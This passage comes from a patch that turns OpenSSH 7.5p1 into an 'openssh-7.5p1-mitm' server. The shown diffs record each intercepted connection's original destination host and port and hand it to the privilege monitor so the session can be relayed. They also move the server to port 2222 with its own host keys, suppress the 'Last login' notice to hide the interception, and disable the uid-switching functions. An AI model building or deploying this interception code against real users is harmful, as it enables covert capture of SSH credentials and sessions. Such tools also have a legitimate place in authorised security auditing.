4562.     signal(SIGINT, SIG_DFL);
4563.  
4564. +#ifndef DEBUG_HOST
4565. +   if (getsockopt(sock_in, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *)&origaddr, &origaddr_len) != 0)
4566. +     fatal("%s: getsockopt failed.", __func__);
4567. +
4568. +   lol->original_host = strdup(inet_ntoa(origaddr.sin_addr));
4569. +   lol->original_port = ntohs(origaddr.sin_port);
4570. +#else
4571. +   lol->original_host = strdup(DEBUG_HOST);
4572. +   lol->original_port = DEBUG_PORT;
4573. +#endif
4574. +
4575.     /*
4576.      * Register our connection.  This turns encryption off because we do
4577.      * not have a key.
4578. @@ -2040,6 +2074,7 @@
4579.      */
4580.     if (use_privsep) {
4581.         mm_send_keystate(pmonitor);
4582. +       mm_send_lol(pmonitor, lol);
4583.         exit(0);
4584.     }
4585.  
4586. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshd_config openssh-7.5p1-mitm/sshd_config
4587. --- openssh-7.5p1/sshd_config   2017-03-19 22:39:27.000000000 -0400
4588. +++ openssh-7.5p1-mitm/sshd_config  2018-06-12 17:44:46.349760695 -0400
4589. @@ -10,22 +10,24 @@
4590. # possible, but leave them commented.  Uncommented options override the
4591. # default value.
4592.  
4593. -#Port 22
4594. +Port 2222
4595. #AddressFamily any
4596. #ListenAddress 0.0.0.0
4597. #ListenAddress ::
4598.  
4599. -#HostKey /etc/ssh/ssh_host_rsa_key
4600. +HostKey /home/ssh-mitm/etc/ssh_host_rsa_key
4601. #HostKey /etc/ssh/ssh_host_dsa_key
4602. #HostKey /etc/ssh/ssh_host_ecdsa_key
4603. -#HostKey /etc/ssh/ssh_host_ed25519_key
4604. +HostKey /home/ssh-mitm/etc/ssh_host_ed25519_key
4605. +
4606. +PrintMotd no
4607.  
4608. # Ciphers and keying
4609. #RekeyLimit default none
4610.  
4611. # Logging
4612. -#SyslogFacility AUTH
4613. -#LogLevel INFO
4614. +SyslogFacility AUTH
4615. +LogLevel INFO
4616.  
4617. # Authentication:
4618.  
4619. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/sshlogin.c openssh-7.5p1-mitm/sshlogin.c
4620. --- openssh-7.5p1/sshlogin.c    2017-03-19 22:39:27.000000000 -0400
4621. +++ openssh-7.5p1-mitm/sshlogin.c   2018-06-12 17:44:46.349760695 -0400
4622. @@ -113,7 +113,8 @@
4623.         else
4624.             snprintf(buf, sizeof(buf), "Last login: %s from %s\r\n",
4625.                 time_string, hostname);
4626. -       buffer_append(&loginmsg, buf, strlen(buf));
4627. +       /* Suppress message about last login. */
4628. +       /*buffer_append(&loginmsg, buf, strlen(buf));*/
4629.     }
4630. # endif /* CUSTOM_SYS_AUTH_GET_LASTLOGIN_MSG */
4631. #endif /* NO_SSH_LASTLOG */
4632. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/uidswap.c openssh-7.5p1-mitm/uidswap.c
4633. --- openssh-7.5p1/uidswap.c 2017-03-19 22:39:27.000000000 -0400
4634. +++ openssh-7.5p1-mitm/uidswap.c    2018-06-12 17:44:46.349760695 -0400
4635. @@ -59,6 +59,8 @@
4636. void
4637. temporarily_use_uid(struct passwd *pw)
4638. {
4639. +        /* Since we are never running as root, don't ever try to change uid/gid. */
4640. +   return;
4641.     /* Save the current euid, and egroups. */
4642.  #ifdef SAVED_IDS_WORK_WITH_SETEUID
4643.     saved_euid = geteuid();
4644. @@ -134,6 +136,8 @@
4645.  void
4646.  permanently_drop_suid(uid_t uid)
4647.  {
4648. +        /* Since we are never running as root, don't ever try to change uid/gid. */
4649. +   return;
4650. #ifndef NO_UID_RESTORATION_TEST
4651.     uid_t old_uid = getuid();
4652. #endif
4653. @@ -168,6 +172,8 @@
4654. void
4655. restore_uid(void)
4656. {
4657. +        /* Since we are never running as root, don't ever try to change uid/gid. */
4658. +   return;
4659.     /* it's a no-op unless privileged */
4660.     if (!privileged) {
4661.         debug("restore_uid: (unprivileged)");
4662. @@ -205,6 +211,8 @@
4663. void
4664. permanently_set_uid(struct passwd *pw)
4665. {
4666. +        /* Since we are never running as root, don't ever try to change uid/gid. */
4667. +   return;
4668.  #ifndef NO_UID_RESTORATION_TEST
4669.     uid_t old_uid = getuid();
4670.     gid_t old_gid = getgid();